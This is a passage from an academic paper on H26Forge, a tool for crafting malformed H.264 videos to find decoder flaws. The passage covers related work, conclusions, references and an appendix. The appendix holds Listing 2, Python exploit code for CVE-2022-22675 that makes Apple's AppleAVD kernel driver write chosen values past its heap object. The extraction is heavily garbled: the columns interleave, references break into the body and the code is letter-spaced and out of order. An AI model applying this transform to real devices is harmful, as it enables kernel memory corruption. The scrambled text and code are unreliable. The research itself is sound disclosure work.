guard page access. Though there is an assert in the code to
21 Online: https://github.com/Honor8Dev/android_kernel_
huawei_FRD-L04/blob/master/drivers/vcodec/imagination/ 22 Online: https://github.com/MiCode/Xiaomi_Kernel_
D5500_DRM/decoder/vdec/kernel_device/libraries/vdecdd/code/ OpenSource/blob/begonia-r-oss/drivers/misc/mediatek/devapc/
vdecdd_mmu.c. devapc-mtk-common.c#L333.
prevent an overflow, it is not blocking and merely prints an to replace compressed data in certain file formats with ran-
assert failure. dom bytes that can “be successfully decompressed with high
We use H26F ORGE to generate videos that use FMO with probability.” FuzzGen [22] generates fuzzers for libraries by
a fixed width of 1280 and increasing height to determine the reviewing their real world usage and produces LLVM lib-
bounds of our overflow. Though H26F ORGE cannot decode Fuzzer stubs. The FuzzGen authors evaluated FuzzGen on
FMO videos, it can generate videos that use it. Android codec libraries and found 17 vulnerabilities in H.265
and H.264 codec handling. Synopsis Defensics is an industry
fuzzer that provides an H.264 test suite,26 but they describe
6.3.5 CedarV uninitialized memory leak
slice data testing via mutation fuzzing. It is unclear if it can
On the Pine A64 with the CedarV video decoder, we dis- generate syntax-compliant encoded H.264 videos. None of
covered a new way to exploit the Android ION vulnerability these fuzzers focus on video generation at the syntax level;
found in [47], which allows for kernel information leakage. they also ignore CAVLC and CABAC encoded elements.
We leak out uninitialized memory by creating a video with The security of hardware accelerators is a focus of much re-
H26F ORGE whose first slice NALU is an IDR B slice. The cent work. Olson, Sethumadhavan, and Hill [36] systematize
IDR NALU leads CedarV to create an ION allocation for the threats posed to users by insecure third-party accelerators.
a frame, but the B slice type causes an error, so CedarV In exemplifying these risks, there is much academic and indus-
returns the uninitialized ION memory. The issue only arises try research looking at third party accelerators, such as neural
when CedarV manages the frame allocation; the Android OS processing units [7, 32, 39], digital signal processors [28,
handles frame management when the output is to a Surface, 29], graphics processing units [19], wireless coprocessors [8,
preventing an information leak. 9, 12, 20], security coprocessors [31, 46], and, as described
We defer to Section 6.4 of [47] to describe the exploitation above, hardware video decoders [13, 16, 45].
of this vulnerability.
8 Conclusion
7 Related Work We have described H26F ORGE, domain-specific infrastruc-
ture for analyzing, generating, and manipulating syntactically
We are not familiar with any existing tool that can program- correct but semantically spec-non-compliant video files. Us-
matically modify the syntax elements of an H.264 encoded ing H26F ORGE, we have discovered (and responsibly dis-
video. The current swiss-army knife of the video world, FFm- closed) multiple memory corruption vulnerabilities in video
peg,23 can decode and encode common H.264 videos, but decoding stacks from multiple vendors.
errors out on spec-non-compliant videos and does not sup- We draw two conclusions from our experience with
port many H.264 features. The H.264 reference decoder,24 H26F ORGE.
which is the ground truth for the H.264 spec, does not keep First, domain-specific tools are useful and necessary for
the syntax elements in memory as it focuses on producing an improving video decoder security. Generic fuzzing tools have
output image. Even tools for debugging video files, such as been used with great success to improve the quality of other
Elecard’s StreamEye,25 are used to visually inspect videos to kinds of media-parsing libraries, but that success has evidently
adjust a video encoder rather than edit syntax elements. not translated to video decoding.
Several exploitable vulnerabilities in video decoders have The bugs we found and described in Section 5 have been
previously been demonstrated. Gong and Pi [16] describe present in iOS for a long time. We have tested that our proof-
an exploitable vulnerability in the Venus firmware found in of-concept videos induce kernel panics on devices running
Qualcomm Snapdragon SoCs. Donenfeld [13] found a ker- iOS 13.3 (released December 2019) and iOS 15.6 (released
nel overwrite vulnerability in the AppleD5500.kext for iOS July 2022). Binary analysis suggests that the first bug we
10. Tarakanov and Labunets [45] found an out-of-bounds identified was present in the kernel as far back as iOS 10, the
write vulnerability in AppleAVD.kext and discuss its inter- first release whose kernel binary was distributed unencrypted.
nals. They also discuss CVE-2022-22675, but do not provide We make H26F ORGE available at https://github.com/
details on how to extend the initial overflow. h26forge/h26forge under an open source license. We hope
Format-aware fuzzers such as QuickFuzz [17] and its that it will facilitate followup work, both by academic re-
derivatives [37, 44] can generate test inputs based on a gram- searchers and by the vendors themselves, to improve the
mar, but they cannot produce the entropy-encoded values software quality of video decoders.
needed for H.264. For example, FormatFuzzer [15] opts Second, the video decoder ecosystem is more insecure than
23 Online:
previously realized. Platform vendors should urgently con-
https://www.ffmpeg.org/.
24 Online:
https://vcgit.hhi.fraunhofer.de/jvet/JM. 26 Online: https://www.synopsys.com/software-integrity/
25 Online: https://www.elecard.com/products/video-analysis/ security-testing/fuzz-testing/defensics/protocols/h264-
streameye. file.html.
sider designs that deprivilege software and hardware compo- [5] “About the security content of iOS 16.2 and iPadOS 16.2.” Online:
nents that process untrusted video input. https://support.apple.com/en-us/HT213530. Dec. 2022.
Browser vendors have worked to sandbox media decoding [6] Apple Platform Security. Online: https://help.apple.com/pdf/
libraries (see, e.g., Narayan et al. [34]); so have messaging security/en_US/apple-platform-security-guide.pdf. Dec.
2022.
app vendors, with the iMessage BlastDoor process being a
[7] Brandon Azad. “An iOS hacker tries Android.” Online: https://
notable example [18]. Mobile OS vendors have also worked
googleprojectzero.blogspot.com/2020/12/an-ios-hacker-
to sandbox system media servers.27 These efforts are under- tries-android.html. Dec. 2020.
mined by parsing video formats in kernel drivers. [8] Ian Beer. “An iOS zero-click radio proximity exploit odyssey.” On-
Our reading of reverse-engineered kernel drivers suggests line: https://googleprojectzero.blogspot.com/2020/12/
that current hardware relies on software to parse parameter an-ios-zero-click-radio-proximity.html. Dec. 2020.
sets and populate a context structure used by the hardware in [9] Gal Beniamini. “Over The Air: Exploiting Broadcom’s Wi-Fi Stack
macroblock decoding. It is not clear that it is safe to invoke (Part 1).” Online: https://googleprojectzero.blogspot.com/
2017/04/over- air- exploiting- broadcoms- wi- fi_4.html.
hardware decoding with a maliciously constructed context Apr. 2017.
structure, which suggests that whatever software component
[10] Mark Brand. “Stagefrightened?” Online: https://googleprojec
is charged with parsing parameter sets and populating the tzero.blogspot.com/2015/09/stagefrightened.html. Sept.
hardware context will need to be trusted, whether it is in the 2015.
kernel or not. It may be worthwhile to rewrite this software [11] “CERT Vulnerability Note VU#924951.” Online: https://www.kb.
component in a memory-safe language, such as the cros- cert.org/vuls/id/924951. July 2015.
codecs 28 effort, or to apply formal verification techniques to [12] Jiska Classen, Francesco Gringoli, Michael Hermann, and Matthias
it. Hollick. “Attacks on Wireless Coexistence: Exploiting Cross-
An orthogonal direction for progress, albeit one that will Technology Performance Features for Inter-Chip Privilege Escalation.”
In: Proceedings of IEEE Security and Privacy (“Oakland”) 2022
require the support of media IP vendors, would redesign the (May 2022), pp. 1229–45.
software–hardware interface to simplify it. The Linux push
[13] Adam Donenfeld. “Viewer Discretion Advised: (De)coding an iOS
for stateless hardware video decoders [14] is a step in this Kernel Vulnerability.” In: Phrack 70 (Oct. 2021). Online: http:
direction. Similarly, encoders that produce outputs that are //phrack.org/issues/70/8.html.
software-decoder friendly, such as some AV1 encoders [27], [14] Nicolas Dufresne. “Linux Stateless Video Decoder Support.” Pre-
help reduce the expected complexity of video decoders. sented at ELC 2020. Slides online: https://elinux.org/images/
c/c7/2020-06_ELCNA_-_Nicolas_Dufresne.pdf. July 2020.
[15] Rafael Dutra, Rahul Gopinath, and Andreas Zeller. “Format-
Acknowledgements Fuzzer: Effective Fuzzing of Binary File Formats.” arXiv preprint
arXiv:2109.11277. Online: https : / / arxiv . org / abs / 2109 .
We would first like to acknowledge Øystein Sigholt and 11277. Sept. 2021.
Jiaming Hu, whose 2018 CSE 227 browser fingerprinting [16] Xiling Gong and Peter Pi. “Bypassing the Maginot Line: Remotely
project was the first to encounter the Luma Chroma Thief Exploit the Hardware Decoder on Smartphone.” Presented at Black
Hat 2019. Slides online: https://i.blackhat.com/USA- 19/
effect and inspired the tooling effort described in this paper. Wednesday/us-19-Gong-Bypassing-The-Maginot-Line-Remo
We would also like to thank Alex Gantman, David Kohlbren- tely- Exploit- The- Hardware- Decoder- On- Smartphone.pdf.
ner, and Stefan Savage for conversations about this work, and Aug. 2019.
Hang Zhang and Zhiyun Qian for discussing their ION alloca- [17] Gustavo Grieco, Martín Ceresa, Agustín Mista, and Pablo Buiras.
tor work with us. This work was partly supported by a grant “QuickFuzz testing for fun and profit.” In: Journal of Systems and
from Cisco and a research gift from Qualcomm. Software 134 (Dec. 2017), pp. 340–54.
[18] Samuel Groß. “A Look at iMessage in iOS 14.” Online: https :
//googleprojectzero.blogspot.com/2021/01/a- look- at-
References imessage-in-ios-14.html. Jan. 2021.
[19] Ben Hawkes. “Attacking the Qualcomm Adreno GPU.” Online: http
[1] Paul Adenot and Bernard Aboba. WebCodecs. Working Draft. Online: s://googleprojectzero.blogspot.com/2020/09/attacking-
https://www.w3.org/TR/webcodecs/. W3C, Feb. 2023. qualcomm-adreno-gpu.html. Sept. 2020.
[2] “About the security content of iOS 16.1 and iPadOS 16.” Online: [20] Grant Hernandez, Marius Muench, Dominik Maier, Alyssa Milburn,
https://support.apple.com/en-us/HT213489. Oct. 2022. Shinjo Park, Tobias Scharnowski, Tyler Tucker, Patrick Traynor, and
[3] “About the security content of iOS 15.7.1 and iPadOS 15.7.1.” Online: Kevin R. B. Butler. “FirmWire: Transparent Dynamic Analysis for
https://support.apple.com/en-us/HT213490. Oct. 2022. Cellular Baseband Firmware.” In: Proceedings of NDSS 2022. Feb.
2022.
[4] “About the security content of iOS 15.7.2 and iPadOS 15.7.2.” Online:
https://support.apple.com/en-us/HT213531. Dec. 2022. [21] Imagination Technologies. “Metagence Multi-threaded Processor IP
Cores.” Archived: https://web.archive.org/web/2006081315
27 See, e.g., https://source.android.com/docs/core/media/ 2939/http://www.imgtec.com/metagence/products/. 2006.
framework-hardening. [22] Kyriakos Ispoglou, Daniel Austin, Vishwath Mohan, and Mathias
28 Online: https://chromium.googlesource.com/crosvm/crosvm/
Payer. “FuzzGen: Automatic Fuzzer Generation.” In: Proceedings of
+/refs/heads/main/media/cros-codecs/. USENIX Security 2020. Aug. 2020, pp. 2271–87.
[23] H.264: Advanced video coding for generic audiovisual services. Stan- [41] Iain E. Richardson. The H.264 Advanced Video Compression Stan-
dard. Online: https : / / www . itu . int / rec / T - REC - H . 264 - dard. second. Wiley, 2010.
202108-I/en. ITU-T, Aug. 2021. [42] Ton Roosendaal. “Big Buck Bunny.” In: ACM SIGGRAPH ASIA
[24] Conformance specification for ITU-T H.264 advanced video coding. 2008 Computer Animation Festival. Dec. 2008, p. 62.
Standard. Online: https://www.itu.int/rec/T-REC-H.264.1- [43] Natalie Silvanovich. “CVE-2022-22675: AppleAVD Overflow in
201602-I/en. ITU-T, Aug. 2021. AVC_RBSP::parseHRD.” Online: https://googleprojectzero.
[25] Pierre Laperdrix, Nataliia Bielova, Benoit Baudry, and Gildas Avoine. github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-
“Browser Fingerprinting: A Survey.” In: ACM Transactions on the 22675.html. May 2022.
Web 14.2 (Apr. 2020). [44] Prashast Srivastava and Mathias Payer. “Gramatron: Effective
[26] Kevin Lee, Vijay Rao, and William Arnold. “Accelerating Facebook’s Grammar-Aware Fuzzing.” In: Proceedings of ISSTA 2021. July
infrastructure with application-specific hardware.” Online: https: 2021, pp. 244–56.
//engineering.fb.com/2019/03/14/data-center-engineeri [45] Nikita Tarakanov and Andrey Labunets. “Cinema time!” Presented
ng/accelerating-infrastructure/. Mar. 2019. at Hexacon 2022. Slides online: https://github.com/isciurus/
[27] Ryan Lei, Haixia Shi, Haoteng Chen, Ali Monfared, and Cheng Shi. hexacon2022_AppleAVD/blob/main/hexacon2022_AppleAVD.
“How Meta brought AV1 to Reels.” Online: https://engineer pdf. Oct. 2022.
ing.fb.com/2023/02/21/video- engineering/av1- codec-
[46] David Wang, Mathew Solnik, and Tarjei Mandt. “Demystifying the
facebook-instagram-reels/. Feb. 2023.
Secure Enclave Processor.” Presented at Black Hat 2016. Slides
[28] Slava Makkaveev. “Looking for vulnerabilities in MediaTek audio online: https://www.blackhat.com/docs/us-16/materials/u
DSP.” Online: https://research.checkpoint.com/2021/loo s-16-Mandt-Demystifying-The-Secure-Enclave-Processor.
king-for-vulnerabilities-in-mediatek-audio-dsp/. Nov. pdf. Aug. 2016.
2021.
[47] Hang Zhang, Dongdong She, and Zhiyun Qian. “Android ION Haz-
[29] Slava Makkaveev. “Pwn2Own Qualcomm DSP.” Online: https: ard: The Curse of Customizable Memory Management System.” In:
//research.checkpoint.com/2021/pwn2own- qualcomm- dsp/. Proceedings of the 2016 ACM SIGSAC Conference on Computer and
May 2021. Communications Security. 2016, pp. 1663–1674.
[30] Detlev Marpe, Thomas Wiegand, and Stephen Gordon. “H.264/
MPEG4-AVC Fidelity Range Extensions: Tools, Profiles, Perfor-
mance, and Application Areas.” In: Proceedings of ICIP 2005, Vol- A More details on CVE-2022-22675
ume I. Sept. 2005, pp. 593–96.
[31] Damiano Melotti, Maxime Rossi-Bellom, and Andrea Continella. This section provides more details on how we controlled the
“Reversing and Fuzzing the Google Titan M Chip.” In: Proceedings second overflow in our proof-of-concept video for CVE-2022-
of ROOTS 2021. Nov. 2021, pp. 1–10. 22675. Listing 2 shows the final transform.
[32] Man Yue Mo. “Fall of the Machines: Exploiting the Qualcomm We enable a second overflow in parsePredWeightTable
NPU (Neural Processing Unit) Kernel Driver.” Online: https://
by overwriting num_ref_idx_l0_active_minus1 with
securitylab . github . com / research / qualcomm _ npu/. Nov.
2021. CVE-2022-22675. The function parsePredWeightTable
[33] “Mozilla Foundation Security Advisory 2022-40.” Online: https: loops from 0 to num_ref_idx_l0_active_minus1, check-
//www.mozilla.org/en-US/security/advisories/mfsa2022- ing a luma or chroma flag at each instance to determine
40/. Sept. 2022. whether to parse the syntax elements luma_weight, luma_
[34] Shravan Narayan, Craig Disselkoen, Tal Garfinkel, Nathan Froyd, offset, chroma_weight, and chroma_offset when the re-
Eric Rahm, Sorin Lerner, Hovav Shacham, and Deian Stefan. spective flag is set. The H.264 User Context maintains eight
“Retrofitting Fine Grain Isolation in the Firefox Renderer.” In: Pro-
ceedings of USENIX Security 2020. Aug. 2020, pp. 699–716.
lists of type uint16: for both reference lists, it has arrays
of length 16 for luma_weight and luma_offset, and arrays
[35] Hikaru Nishida, Suleiman Souhlal, and Sangwhan Moon. “Making
Android Runtime on Chrome OS More Secure and Easier to Upgrade of length 32 for chroma_weight and chroma_offset. For
with ARCVM.” Online: https : / / chromeos . dev / en / posts / each syntax element, AppleAVD.kext will exp-Golomb de-
making-android-more-secure-with-arcvm. Mar. 2022. code it, store the recovered value in the H.264 User Context,
[36] Lena E. Olson, Simha Sethumadhavan, and Mark D. Hill. “Secu- and then check to see if it is in the range [0,255].
rity Implications of Third-Party Accelerators.” In: IEEE Computer We found that in parsePredWeightTable, the overwritten
Architecture Letters 15.1 (Jan. 2016), pp. 50–53.
8-bit num_ref_idx_l0_active_minus1 is sign-extended to
[37] Rohan Padhye, Caroline Lemieux, Koushik Sen, Mike Papadakis,
and Yves Le Traon. “Semantic Fuzzing with Zest.” In: Proceedings
32-bits. This means that setting it to a value larger than 127
of ISSTA 2019. July 2019, pp. 329–40. leads to a uint32 loop bound of at least 4,294,967,040! If
[38] Gwendal Patat, Mohamed Sabt, and Pierre-Alain Fouque. “Exploring the encoded bitstream is exhausted without failure, then the
Widevine for Fun and Profit.” In: Proceedings of WOOT 2022. May bitstream reader will return a bit string of all 1s which exp-
2022, pp. 277–88. Golomb decode to 0. This is within the bounds for each syntax
[39] Maxime Peterlin. “Reversing and Exploiting Samsung’s Neural Pro- element, and thus the loop will continue until the entire kernel
cessing Unit.” Online: https : / / blog . impalabs . com / 2103 _ heap is overflowed, triggering a kernel panic. Alternatively,
reversing-samsung-npu.html. Mar. 2021.
if the decoder encounters a luma/chroma weight or offset
[40] Parthasarathy Ranganathan, Daniel Stodolsky, Jeff Calow, Jeremy
outside the expected bounds, it first stores the out-of-bounds
Dorfman, Marisabel Guevara, Clinton Wills Smullen IV, et al.
“Warehouse-Scale Video Acceleration: Co-Design and Deployment in weight or offset as normal and then it exits the loop, emits an
the Wild.” In: Proceedings of ASPLOS 2021. Apr. 2021, pp. 600–15. error message, and continues to the next NALU.
Therefore, to escape the 32-bit sign extended loop, we 42 p p s _ t g t _ p a y l o a d 0 = n u m _ r e f _ i d x _ p a y l o a d << 16 # b o t t o m b y t e i s
num_ref_idx_l0_default_active_minus1
encode a weight or offset element Bn in the range [256, 43 p p s _ t g t _ p a y l o a d 0 | = n u m _ r e f _ i d x _ p a y l o a d << 8 # t o p b y t e i s
num_ref_idx_l1_default_active_minus1
65535] at the point we would like to target. To do so, we 44 p p s _ t g t _ p a y l o a d 0 | = i n t ( d s [ " p p s e s " ] [ 0 ] [ " w e i g h t e d _ p r e d _ f l a g " ] ) << 24 # v a l u e
i s a byte
need to enable the luma and chroma flags and fill in the cor- 45 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
cpb_size_values_minus1 " ][ ref_idx_overwrite_idx ] = pps_tgt_payload0
responding luma_weight, luma_offset, chroma_weight, 46
47 # ####
and chroma_offset entries. The flags are decoded and 48 # Step 2. Prepare f o r our second o v e r w r i t e in p r e d _ w e i g h t _ t a b l e decoding
49 # ####
checked on each loop, so we include an encoding of the flags 50
51 # S e t a l l s l i c e s t o IDR s l i c e s t o a v o i d " m i s s i n g Keyframe " e r r o r
in the generated bitstream. When the flags are set to true, we 52 f o r i i n range ( l e n ( ds [ " n a l u _ h e a d e r s " ] ) ) :
53 i f d s [ " n a l u _ h e a d e r s " ] [ i ] [ " n a l _ u n i t _ t y p e " ] == 1 :
can write values in the range [0, 255] without exiting early. 54 ds [ " n a l u _ h e a d e r s " ] [ i ] [ " n a l _ u n i t _ t y p e " ] = 5
55
When they are set to false, AppleAVD.kext writes a default 56 p r i n t ( " \ t Need {} P s l i c e s t o w r i t e t h e m e s s a g e 0x {} " . f o r m a t ( l e n (
m e s s a g e _ s n i p p e t s ) , message_hex ) )
value at those locations. Either way, intermediate memory up 57
58 n a l u _ i d x = 4 # Our v i d e o i s SPS , PPS , SPS , I , P s o we copy i n d e x 4
to our target is modified. Because the flags must be checked 59 s l i c e _ i d x = 1 # We want t h e P s l i c e t o be c o p i e d
60 w h i l e l e n ( d s [ " s l i c e s " ] ) <= l e n ( m e s s a g e _ s n i p p e t s ) :
on each loop, the slice header size is proportional to the target 61 d s = c l o n e _ a n d _ a p p e n d _ e x i s t i n g _ s l i c e ( ds , n a l u _ i d x , s l i c e _ i d x )
62
offset. In all, writing an arbitrary sequence of 16-bit values to 63 # ####
64 # S t e p 3 . Modify r e l e v a n t s l i c e s t o w r i t e o u r t a r g e t m e s s a g e
memory requires n slices for n larger-than-255 values, with 65 # ####
66 f o r i i n range ( 1 , l e n ( ds [ " s l i c e s " ] ) ) :
smaller values written by enabling intermediate flags. 67 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " n u m _ r e f _ i d x _ a c t i v e _ o v e r r i d e _ f l a g " ] = F a l s e
68 a v c u s e r c o n t e x t _ o f f s e t = o f f s e t # This w i l l w r i t e r i g h t next to our
When using multiple slices for multiple writes, each previous write
69 o f f s e t _ f r o m _ s l i c e = a v c u s e r c o n t e x t _ o f f s e t − 0 x374d4 # t h i s c o n s t a n t i s
slice must be within an IDR NALU, as the out-of-bounds the s t a r t of the S l i c e o f f s e t
70 c h r o m a _ o f f s e t _ o v e r w r i t e _ n u m = ( o f f s e t _ f r o m _ s l i c e − 0 x206 ) / 4 # 0 x206 i s
luma/chroma offset/weight is treated as a decoding error, and t h e o f f s e t from t h e s t a r t o f t h e s l i c e ;
71 s l i c e _ n u m _ r e f _ i d x _ p a y l o a d = c h r o m a _ o f f s e t _ o v e r w r i t e _ n u m + (1 − i ) / 2 + i n t (
the decoder uses IDR NALUs for recovery. We adjust the math . c e i l ( l e n ( m e s s a g e _ h e x ) / 8 . 0 ) )
72
slices using the same technique we used for the infinite loop 73 # I f we h a v e an odd number o f ' s h o r t ' t y p e s we want t o w r i t e ,
74 # and i f we ' r e w r i t i n g t h e l o w e r end o f b y t e s , we n e e d t o
bug discussed in Section 5.1. 75 # s l i g h t l y r e c a l i b r a t e where we w r i t e
76 i f l e n ( d s [ " s l i c e s " ] ) % 2 == 0 and i % 2 == 0 :
77 s l i c e _ n u m _ r e f _ i d x _ p a y l o a d −= 1
Listing 2: CVE-2022-22675 video transform. 78 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " n u m _ r e f _ i d x _ l 0 _ a c t i v e _ m i n u s 1 " ] =
slice_num_ref_idx_payload
79 d s [ " s l i c e s " ] [ i ] [ " s h " ] [ " l u m a _ l o g 2 _ w e i g h t _ d e n o m " ] = 0 # 1 << X i s s t o r e d
1 d e f c ve _ 2 0 22 _ 2 2 67 5 ( ds , m e s s a g e ) :
80 d s [ " s l i c e s " ] [ i ] [ " s h " ] [ " c h r o m a _ l o g 2 _ w e i g h t _ d e n o m " ] = 0 # 1 << X i s s t o r e d
2 from h e l p e r s i m p o r t n e w _ v u i _ p a r a m e t e r , n e w _ h r d _ p a r a m e t e r ,
81 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " l u m a _ w e i g h t _ l 0 _ f l a g " ] = [ F a l s e ] * (
clone_and_append_existing_slice
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
3 i m p o r t math
82
4
83 # on t h e d e v i c e , t h i s i s s h i f t e d by t h e s p s . b i t _ d e p t h _ l u m a _ v a l u e _ m i n u s 8
5 # T h i s i s t h e o f f s e t from t h e s t a r t o f t h e c o n t e x t
84 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " luma_weight_l0 " ] = [ 0 ] * (
6 # − O b j e c t s i z e i s 0 x8642b0
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
7 # − A l l o c a t e d s i z e i s 0 x868000
85 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " l u m a _ o f f s e t _ l 0 " ] = [ 0 ] * (
8 o f f s e t = 0 x868000
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
9 # Keep t h i s e v e n w i t h no s h o r t i n t h e r a n g e [ 0 x0000 , 0 x 0 0 7 f ]
86 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ w e i g h t _ l 0 _ f l a g " ] = [ F a l s e ] * (
10 message_hex = " deadbeef41414141 "
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
11
87
12 m e s s a g e _ s n i p p e t s = [ i n t ( message_hex [ i : i +4] , 16) f o r i i n range ( 0 , l e n (
88 # on t h e d e v i c e , t h i s i s s h i f t e d by t h e s p s . b i t _ d e p t h _ c h r o m a _ v a l u e _ m i n u s 8
message_hex ) , 4) ] [ : : − 1 ]
89 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " chroma_weight_l0 " ] = [ [ 0 , 0 ] ] * (
13
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
14 p r i n t ( " \ t W r i t i n g ' 0 x { } ' a t f u r t h e s t o f f s e t l o c a t i o n 0x { : x } " . f o r m a t (
90 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] = [ [ 0 , 0 ] ] * (
message_hex , o f f s e t ) )
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
15
91
16 # ####
92 # The l o c a t i o n we ' r e o v e r w r i t i n g
17 # S t e p 1 . Use parseHRD o v e r w r i t e t o c h a n g e t h e d e f a u l t n u m _ r e f _ i d x v a l u e
93 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ w e i g h t _ l 0 _ f l a g " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
18 # ####
= True
19
94 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " chroma_weight_l0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ] = [0
20 # We n e e d t h i s f l a g e n a b l e d t o go i n t o s e c o n d o v e r w r i t e
x64+ i , 0 x65+ i ]
21 ds [ " ppses " ] [ 0 ] [ " w e i g h t e d _ p r e d _ f l a g " ] = True
95
22
96 # Our t a r g e t o v e r w r i t e l o c a t i o n
23 # P r e p a r e o u r o v e r w r i t i n g SPS
97 i f l e n ( d s [ " s l i c e s " ] ) % 2 == 1 : # We a r e w r i t i n g an e v e n number o f s h o r t s
24 s p s _ i d x = 1 # We t a r g e t t h e 2 nd SPS
98 i f i % 2 == 1 :
25 c p b _ c n t _ m i n u s 1 = 68 # T h i s v a l u e i s l i m i t e d t o 2 5 5 ; we s e t i t t o 68 f o r
99 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
targeting
= [ m e s s a g e _ s n i p p e t s [ i ] , 0 x20 ]
26 r e f _ i d x _ o v e r w r i t e _ i d x = 68 # F i r s t i n d e x where we o v e r w r i t e t h e
100 else :
num_ref_idx_l0_default_active_minus1
101 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
27 num_ref_idx_payload = 0 xff
= [ 0 x21 , m e s s a g e _ s n i p p e t s [ i − 2 ] ]
28
102 e l s e : # odd number o f s h o r t v a l u e s
29 d s [ " s p s e s " ] [ s p s _ i d x ] [ " s e q _ p a r a m e t e r _ s e t _ i d " ] = 31
103 i f i % 2 == 0 :
30 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s _ p r e s e n t _ f l a g " ] = True
104 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
31 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] = new_vui_parameter ( )
= [ 0 x20 , m e s s a g e _ s n i p p e t s [ i − 1 ] ]
32
105 else :
33 # To maximize o u r o v e r w r i t e , we f o c u s on VCL HRD p a r a m e t e r s , g i v e n i t i s
106 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
c l o s e s t t o t h e end o f t h e o b j e c t
= [ m e s s a g e _ s n i p p e t s [ i − 1 ] , 0 x21 ]
34 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s _ p r e s e n t _ f l a g " ] =
107 r e t u r n ds
True
35 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] =
new_hrd_parameter ( )
36 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
cpb_cnt_minus1 " ] = cpb_cnt_minus1
37 # F i l l up w i t h j u n k and we w i l l w r i t e o v e r what v a l u e s m a t t e r
38 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
b i t _ r a t e _ v a l u e _ m i n u s 1 " ] = [ i f o r i i n range ( cpb_cnt_minus1 +1) ]
39 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
c p b _ s i z e _ v a l u e s _ m i n u s 1 " ] = [ i + c p b _ c n t _ m i n u s 1 +1 f o r i i n r a n g e (
c p b _ c n t _ m i n u s 1 +1 ) ]
40 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ " c b r _ f l a g " ] =
[ F a l s e ] * ( cpb_cnt_minus1 +1)
41 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ " c b r _ f l a g " ] [
r e f _ i d x _ o v e r w r i t e _ i d x − 5 ] = T r u e # PPS E n t r o p y e n c o d i n g